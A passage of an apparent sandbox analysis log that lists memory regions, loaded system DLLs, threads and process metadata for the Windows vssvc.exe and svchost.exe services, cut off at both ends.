start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 276 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 277 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 278 start_va = 0x7fef7e80000 end_va = 0x7fef7e96fff entry_point = 0x7fef7e80000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 279 start_va = 0x7fef7ea0000 end_va = 0x7fef804ffff entry_point = 0x7fef7ea0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 280 start_va = 0x7fefb260000 end_va = 0x7fefb278fff entry_point = 0x7fefb260000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 281 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 282 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 283 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 284 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 285 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 286 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 287 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 288 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 289 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 290 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 291 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 292 start_va = 0x3a0000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 293 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 294 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 297 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 298 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 299 start_va = 0xf0000 end_va = 0xfcfff entry_point = 0xf0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 300 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 301 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 302 start_va = 0x530000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 303 start_va = 0x6c0000 end_va = 0x1abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 304 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 305 start_va = 0x1ac0000 end_va = 0x1ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ac0000" filename = "" Region: id = 306 start_va = 0x1b60000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 307 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 308 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 309 start_va = 0x1ad0000 end_va = 0x1ad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ad0000" filename = "" Region: id = 310 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 311 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 312 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 313 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 314 start_va = 0x1df0000 end_va = 0x20befff entry_point = 0x1df0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 315 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 328 start_va = 0x1c50000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 329 start_va = 0x20c0000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 330 start_va = 0x7fef9000000 end_va = 0x7fef9013fff entry_point = 0x7fef9000000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 331 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 332 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Thread: id = 2 os_tid = 0x988 Thread: id = 5 os_tid = 0x9a8 Thread: id = 6 os_tid = 0x9ac Thread: id = 7 os_tid = 0x9b0 Thread: id = 8 os_tid = 0x9b4 Process: id = "3" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x1b7ec000" os_pid = "0x9b8" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x984" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:000531b8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 333 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 334 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 335 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 336 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 337 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 338 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 339 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 340 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "vssvc.exe.mui" filename = "\\Windows\\System32\\en-US\\VSSVC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssvc.exe.mui") Region: id = 341 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 342 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 343 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 344 start_va = 0x290000 end_va = 0x34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 345 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 346 start_va = 0x370000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 347 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 348 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 349 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 350 start_va = 0x6a0000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 351 start_va = 0x830000 end_va = 0xc22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 352 start_va = 0xc50000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 353 start_va = 0xd50000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 354 start_va = 0xe40000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 355 start_va = 0xfd0000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 356 start_va = 0x1050000 end_va = 0x131efff entry_point = 0x1050000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 357 start_va = 0x13b0000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 358 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 359 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 360 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 361 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 362 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 363 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 364 start_va = 0xff330000 end_va = 0xff4bafff entry_point = 0xff330000 region_type = mapped_file name = "vssvc.exe" filename = "\\Windows\\System32\\VSSVC.exe" (normalized: "c:\\windows\\system32\\vssvc.exe") Region: id = 365 start_va = 0x7fef4860000 end_va = 0x7fef4873fff entry_point = 0x7fef4860000 region_type = mapped_file name = "xolehlp.dll" filename = "\\Windows\\System32\\xolehlp.dll" (normalized: "c:\\windows\\system32\\xolehlp.dll") Region: id = 366 start_va = 0x7fef7230000 end_va = 0x7fef7248fff entry_point = 0x7fef7230000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 367 start_va = 0x7fef7250000 end_va = 0x7fef729ffff entry_point = 0x7fef7250000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 368 start_va = 0x7fef7e80000 end_va = 0x7fef7e96fff entry_point = 0x7fef7e80000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 369 start_va = 0x7fef7ea0000 end_va = 0x7fef804ffff entry_point = 0x7fef7ea0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 370 start_va = 0x7fef9000000 end_va = 0x7fef9013fff entry_point = 0x7fef9000000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 371 start_va = 0x7fef9020000 end_va = 0x7fef9029fff entry_point = 0x7fef9020000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 372 start_va = 0x7fef9070000 end_va = 0x7fef9078fff entry_point = 0x7fef9070000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 373 start_va = 0x7fefb260000 end_va = 0x7fefb278fff entry_point = 0x7fefb260000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 374 start_va = 0x7fefb890000 end_va = 0x7fefb8a3fff entry_point = 0x7fefb890000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 375 start_va = 0x7fefb8b0000 end_va = 0x7fefb8c4fff entry_point = 0x7fefb8b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 376 start_va = 0x7fefb8d0000 end_va = 0x7fefb8dbfff entry_point = 0x7fefb8d0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 377 start_va = 0x7fefb8e0000 end_va = 0x7fefb8f5fff entry_point = 0x7fefb8e0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 378 start_va = 0x7fefc970000 end_va = 0x7fefc97bfff entry_point = 0x7fefc970000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 379 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 380 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 381 start_va = 0x7fefd290000 end_va = 0x7fefd2befff entry_point = 0x7fefd290000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 382 start_va = 0x7fefd340000 end_va = 0x7fefd353fff entry_point = 0x7fefd340000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 383 start_va = 0x7fefd5a0000 end_va = 0x7fefd5c2fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 384 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 385 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 386 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 387 start_va = 0x7fefd970000 end_va = 0x7fefd989fff entry_point = 0x7fefd970000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 388 start_va = 0x7fefdb00000 end_va = 0x7fefdb35fff entry_point = 0x7fefdb00000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 389 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 390 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 391 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 392 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 393 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 394 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 395 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 396 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 397 start_va = 0x7feff300000 end_va = 0x7feff4d6fff entry_point = 0x7feff300000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 398 start_va = 0x7feff4e0000 end_va = 0x7feff550fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 399 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 400 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 401 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 402 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 403 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 404 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 405 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 406 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 407 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 408 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 409 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 410 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 411 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 412 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 413 start_va = 0x7fefbff0000 end_va = 0x7fefc00cfff entry_point = 0x7fefbff0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 414 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 415 start_va = 0x7fefb1c0000 end_va = 0x7fefb226fff entry_point = 0x7fefb1c0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 551 start_va = 0x7fefc540000 end_va = 0x7fefc66bfff entry_point = 0x7fefc540000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 552 start_va = 0x7fef4670000 end_va = 0x7fef46f4fff entry_point = 0x7fef4670000 region_type = mapped_file name = "catsrvut.dll" filename = "\\Windows\\System32\\catsrvut.dll" (normalized: "c:\\windows\\system32\\catsrvut.dll") Region: id = 553 start_va = 0x7fef4850000 end_va = 0x7fef485bfff entry_point = 0x7fef4850000 region_type = mapped_file name = "mfcsubs.dll" filename = "\\Windows\\System32\\mfcsubs.dll" (normalized: "c:\\windows\\system32\\mfcsubs.dll") Thread: id = 11 os_tid = 0x9d4 Thread: id = 12 os_tid = 0x9d0 Thread: id = 13 os_tid = 0x9cc Thread: id = 14 os_tid = 0x9c8 Thread: id = 15 os_tid = 0x9bc Thread: id = 16 os_tid = 0x9d8 Thread: id = 17 os_tid = 0x9dc Thread: id = 34 os_tid = 0x9e8 Thread: id = 61 os_tid = 0x918 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x18692000" os_pid = "0xf0" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x9b8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ddc8" [0xc000000f], "LOCAL" [0x7] Region: id = 416 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 417 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 418 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 419 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 420 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 421 start_va = 0xc0000 end_va = 0x17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 422 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 423 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 424 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 425 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 426 start_va = 0x230000 end_va = 